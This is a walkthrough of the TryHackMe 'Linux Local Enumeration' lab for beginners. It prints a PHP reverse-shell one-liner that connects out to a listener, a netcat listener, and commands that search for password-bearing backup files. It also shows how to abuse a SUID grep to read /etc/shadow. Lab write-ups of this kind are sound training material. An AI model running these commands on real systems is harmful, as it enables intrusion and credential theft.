This is the write up for the room Linux Local Enumeration on Tryhackme and it is part of the complete beginners path
Make connection with VPN or use the attackbox on Tryhackme site to connect to the Tryhackme lab environment.
Tasks Linux Local Enumeration
Task 1
Read all that is in the task start the machine attached to this task
Connect to the machine by navigating to MACHINE_IP:3000 with firefox
I’m using method one
Start a listner in a terminal by typing
nc -nlvp 444
Navigate to MACHINE_IP:3000/cmd
Put in the following ( change IP to your tun0 ip )
php -r '$sock=fsockopen("10.9.135.33",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
You now have a shell. Upgrade shell by typing in
python3 -c 'import pty; pty.spawn("/bin/bash")'
Task 2
2.1 How would you execute /bin/bash with perl?
Google perl bin bash shell. I came across this site
Spawning a TTY Shell (netsec.ws)
Answer: perl —e 'exec "/bin/bash";'
Task 3
3.1 Where can you usually find the id_rsa file? (User = user)
Answer: /home/user/.ssh/id_rsa
3.2 Is there an id_rsa file on the box? (yay/nay)
In the shell navigate to .shh
Answer: nay
Task 4
4.1 How would you print machine hardware name only?
Answer uname -m
4.2 Where can you find bash history?
Answer ~/.bash_history
4.3 What’s the flag?
Type in
cat .bash_history
The flag is in this file. Just read the history
Task 5
Read all that is in the task
5.1 Can you read /etc/passwd on the box? (yay/nay)
Type in the command
cat /etc/passwd
Answer yay
Task 6
Read all that is in the task
6.1 What’s the password you found?
Navigate to the root then type in the following command
find -type f -name '*.bak" 2>dev/null
cat the correct file and notice the password
6.2 Did you find a flag?
Type in the command
find -type f -name "*.conf" 2>dev/null
There is a very long list bu tlook closer and you find
./etc/sysconf/flag.conf
Cat this to screen and you will see the flag
Task 7
7.1 Which SUID binary has a way to escalate your privileges on the box?
Type in the command
find / -perm -u=s -type f 2>/dev/null
If we look trough the list on GTFObins we find grep
Answer grep
7.2 What’s the payload you can use to read /etc/shadow with this SUID?
We know grep can read root files.
Answer grep '' /etc/shadow
You now see the password list.
Task 8
Use both command on your machine to see the results then press complete
Task 9
Notice the 2 script LinPeas and LinEnum. There are also windows version of these tools to run on Windows platforms
Press complete
Task 10
Read all that is in the task and press complete
